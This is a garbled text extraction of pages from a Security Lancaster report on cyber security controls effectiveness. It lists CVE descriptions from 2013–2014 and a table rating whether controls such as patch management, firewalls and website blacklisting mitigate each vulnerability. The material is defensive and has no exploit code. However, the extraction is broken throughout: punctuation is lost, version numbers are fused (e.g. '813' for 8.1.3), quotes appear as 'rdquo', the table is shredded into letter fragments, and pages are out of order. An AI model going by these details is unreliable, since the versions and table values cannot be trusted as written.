corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
